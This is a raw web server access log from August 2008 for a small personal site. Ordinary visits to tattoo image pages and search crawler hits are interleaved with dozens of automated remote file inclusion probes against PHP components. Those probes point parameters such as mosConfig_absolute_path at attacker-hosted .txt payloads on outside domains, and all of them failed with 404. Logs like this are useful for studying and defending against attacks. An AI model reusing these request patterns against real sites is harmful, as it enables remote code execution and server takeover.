213.188.130.113 - - [16/Aug/2008:20:28:13 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:28:13 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:28:42 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
212.150.247.23 - - [16/Aug/2008:20:28:43 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
213.188.130.113 - - [16/Aug/2008:20:29:50 -0500] "GET /logs/access_log.1213401600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:31:04 -0500] "GET /logs/access_log.1208304000//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
202.181.210.195 - - [16/Aug/2008:20:31:13 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:31:16 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
212.150.247.23 - - [16/Aug/2008:20:31:43 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
212.150.247.23 - - [16/Aug/2008:20:31:43 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
74.6.22.107 - - [16/Aug/2008:20:31:46 -0500] "GET /logs/access_log.1204588800 HTTP/1.0" 200 242154 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.64.34.172 - - [16/Aug/2008:20:31:55 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:31:55 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:31:58 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:31:58 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:20:32:25 -0500] "GET /logs/access_log.1206230400//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:20:32:31 -0500] "GET //modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:20:32:34 -0500] "GET /logs//modules/SPChat/images/12.php?teste=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:34:19 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:34:19 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:34:19 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:20:34:28 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:20:34:29 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:20:34:29 -0500] "GET /logs/access_log.1208044800//squirrelcart/cart_content.php?cart_isp_root=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
217.25.160.1 - - [16/Aug/2008:20:34:35 -0500] "GET /logs/access_log.1213488000/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://shorttrackwarriors.com//backup/romid.txt????? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
212.150.247.23 - - [16/Aug/2008:20:34:40 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
212.150.247.23 - - [16/Aug/2008:20:34:40 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
69.64.34.172 - - [16/Aug/2008:20:34:50 -0500] "GET /logs/access_log.1213488000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:34:55 -0500] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:35:18 -0500] "GET /logs/access_log.1214524800//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
65.111.166.193 - - [16/Aug/2008:20:36:18 -0500] "GET /logs/access_log.1202947200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.810"
65.111.166.193 - - [16/Aug/2008:20:36:19 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
65.111.166.193 - - [16/Aug/2008:20:36:19 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
77.240.226.168 - - [16/Aug/2008:20:36:19 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.bmwccth.com/webboard/Packages/osid6.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
77.240.226.168 - - [16/Aug/2008:20:36:19 -0500] "GET ///vwar/backup/errors.php?error=http://www.bmwccth.com/webboard/Packages/osid6.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
77.240.226.168 - - [16/Aug/2008:20:36:19 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.bmwccth.com/webboard/Packages/osid6.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.808"
202.181.210.195 - - [16/Aug/2008:20:36:22 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:36:22 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:36:34 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:20:36:35 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
67.195.98.217 - - [16/Aug/2008:20:36:58 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.208.43.121 - - [16/Aug/2008:20:37:22 -0500] "GET /logs/access_log.1208304000//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:37:42 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
212.150.247.23 - - [16/Aug/2008:20:37:42 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
121.220.25.47 - - [16/Aug/2008:20:38:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:38:53 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:38:53 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:03 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:03 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:04 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:06 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:06 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:07 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:07 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:08 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:08 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:09 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:39:10 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
74.55.113.226 - - [16/Aug/2008:20:40:00 -0500] "GET /logs/access_log.1202947200//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
74.55.113.226 - - [16/Aug/2008:20:40:01 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
74.55.113.226 - - [16/Aug/2008:20:40:01 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:40:23 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:40:23 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:40:38 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
212.150.247.23 - - [16/Aug/2008:20:40:38 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
121.220.25.47 - - [16/Aug/2008:20:41:00 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:01 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:02 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:04 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:05 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:05 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:06 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:06 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:07 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:08 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:09 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
89.208.43.121 - - [16/Aug/2008:20:41:22 -0500] "GET /logs/access_log.1214524800//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
121.220.25.47 - - [16/Aug/2008:20:41:49 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:50 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:50 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:51 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:53 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:53 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:54 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:54 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:55 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:55 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:41:56 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.188.130.113 - - [16/Aug/2008:20:42:01 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:42:01 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:42:01 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:42:08 -0500] "GET /logs/access_log.1214524800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:42:08 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:42:08 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
121.220.25.47 - - [16/Aug/2008:20:42:15 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:16 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:18 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:18 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:18 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:19 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:20 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:20 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:21 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:22 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:22 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
89.208.43.121 - - [16/Aug/2008:20:42:32 -0500] "GET /logs/access_log.1214438400//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
121.220.25.47 - - [16/Aug/2008:20:42:33 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:33 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:20:42:33 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
87.230.21.231 - - [16/Aug/2008:20:42:34 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.230.21.231 - - [16/Aug/2008:20:42:34 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
121.220.25.47 - - [16/Aug/2008:20:42:35 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
62.144.33.204 - - [16/Aug/2008:20:42:41 -0500] "GET /logs/access_log.1214179200//myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
62.144.33.204 - - [16/Aug/2008:20:42:41 -0500] "GET //myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
62.144.33.204 - - [16/Aug/2008:20:42:41 -0500] "GET /logs//myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
